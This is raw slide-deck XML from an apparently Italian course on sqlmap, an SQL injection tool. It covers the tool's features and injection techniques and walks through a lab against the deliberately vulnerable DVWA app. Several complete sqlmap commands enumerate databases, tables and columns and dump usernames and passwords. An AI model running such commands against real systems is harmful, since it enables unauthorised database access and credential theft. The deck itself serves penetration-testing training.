                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Live</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="3240"/>
            </a:br>
            <a:endParaRPr sz="324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sqlmap</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Google Shape;347;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349999" y="1270000"/>
            <a:ext cx="8215370" cy="3857652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="it-IT" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tool open source di penetration testing che consente di automatizzare il processo di detecting e exploiting delle vulnerabilità di tipo SQL injection e acquisizione di server di database;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1440"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="it-IT" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>scritto  in Python</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="348" name="Google Shape;348;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4147268" y="3767597"/>
            <a:ext cx="4988188" cy="2720109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Risultati immagini per sqlmap" id="349" name="Google Shape;349;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9693701" y="264554"/>
            <a:ext cx="1338984" cy="6900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Features</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Google Shape;355;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492606" y="1338552"/>
            <a:ext cx="11292900" cy="4697400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="4572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Full coverage per:</a:t>
            </a:r>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MySQL</a:t>
            </a:r>
            <a:endParaRPr sz="2562">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>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Oracle</a:t>
            </a:r>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PostgreSQL</a:t>
            </a:r>
            <a:endParaRPr sz="2562">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>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Microsoft SQL Server</a:t>
            </a:r>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Microsoft Access</a:t>
            </a:r>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SQLite</a:t>
            </a:r>
            <a:endParaRPr sz="2562">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>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Firebird</a:t>
            </a:r>
            <a:endParaRPr sz="2562">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>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Sybase </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2562">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SAP MaxDB;</a:t>
            </a:r>
            <a:endParaRPr sz="2562">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Google Shape;356;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5750825" y="1254713"/>
            <a:ext cx="5920200" cy="4865100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-390525" lvl="0" marL="457200" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2550"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="❖"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>5 differenti tecniche di SQL injection:</a:t>
            </a:r>
            <a:endParaRPr sz="255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it-IT" sz="2550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1. boolean-based blind</a:t>
            </a:r>
            <a:endParaRPr sz="255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it-IT" sz="2550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2. time-based blind</a:t>
            </a:r>
            <a:endParaRPr sz="255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it-IT" sz="2550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>3. error-based</a:t>
            </a:r>
            <a:endParaRPr sz="255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it-IT" sz="2550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>4. UNION query</a:t>
            </a:r>
            <a:endParaRPr sz="2550">
              <a:solidFill>
                <a:schemeClr val="dk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it-IT" sz="2550">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>5. stacked queries.</a:t>
            </a:r>
            <a:endParaRPr sz="25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g6b4f845734_0_5"/>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latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Fingerprinting</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Google Shape;363;g6b4f845734_0_5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677325" y="1199703"/>
            <a:ext cx="8596800" cy="484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364" name="Google Shape;364;g6b4f845734_0_5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3265575" y="1353188"/>
            <a:ext cx="4819650" cy="2200275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="365" name="Google Shape;365;g6b4f845734_0_5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187400" y="3893675"/>
            <a:ext cx="8086725" cy="2724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6b4f845734_0_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="609600"/>
            <a:ext cx="85968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it-IT">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Creare un dump</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Google Shape;372;g6b4f845734_0_17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677325" y="1307152"/>
            <a:ext cx="8596800" cy="4734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73" name="Google Shape;373;g6b4f845734_0_17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677325" y="1307150"/>
            <a:ext cx="3226175" cy="4734301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="374" name="Google Shape;374;g6b4f845734_0_17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530225" y="1307150"/>
            <a:ext cx="5210650" cy="2864950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="375" name="Google Shape;375;g6b4f845734_0_17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3903488" y="4483338"/>
            <a:ext cx="6772275" cy="1724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Sqlmap test verso DVWA</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="Google Shape;381;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1449390"/>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it-IT"/>
              <a:t>Ottieni utente database per DVWA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Installare Tamperdata addons per firefox</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>sqlmap -u "http://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="it-IT"/>
              <a:t>10.10.10.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=&lt;your&gt;; security=low" -b --current-db --current-user</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>-u, Target URL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>--cookie, HTTP Cookie header</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>-b, recupera banner DBMS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>--current-db, recupera il database corrente DBMS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>--current-user, recupera l'utente corrente DBMS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT"/>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latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sqlmap test verso DVWA</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Google Shape;387;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548025" y="1477098"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1665"/>
              <a:t>Ottenere la lista dei db presenti</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1480"/>
              <a:t>sqlmap -u "http://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="it-IT" sz="1480"/>
              <a:t>10.10.10.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1480"/>
              <a:t>/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=&lt;your&gt;; security=low" –-dbs</a:t>
            </a:r>
            <a:endParaRPr sz="1480"/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1665"/>
              <a:t>Ottenere le tabelle del db dvwa</a:t>
            </a:r>
            <a:endParaRPr sz="1665"/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1480"/>
              <a:t>sqlmap -u "http://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="it-IT" sz="1480"/>
              <a:t>10.10.10.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1480"/>
              <a:t>/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=&lt;your&gt;; security=low" -D dvwa --tables</a:t>
            </a:r>
            <a:endParaRPr sz="1480"/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1665"/>
              <a:t>Ottenere le colonne per la tabella dvwa.users</a:t>
            </a:r>
            <a:endParaRPr sz="1665"/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1480"/>
              <a:t>sqlmap -u "http://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="it-IT" sz="1480"/>
              <a:t>10.10.10.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1480"/>
              <a:t>/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=&lt;your&gt;; security=low" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-D dvwa -T users --columns</a:t>
            </a:r>
            <a:endParaRPr sz="1480"/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1665"/>
              <a:t>Ottenere utenti e le loro password dalla tabella dvwa.users</a:t>
            </a:r>
            <a:endParaRPr sz="1665"/>
          </a:p>
          <a:p>
            <a:pPr indent="-320040" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buChar char="►"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1480"/>
              <a:t>sqlmap -u "http://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="it-IT" sz="1480"/>
              <a:t>10.10.10.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1480"/>
              <a:t>/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=&lt;your&gt;; security=low"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -D dvwa -T users -C user,password --dump</a:t>
            </a:r>
            <a:endParaRPr sz="1480"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1480"/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0" algn="l">
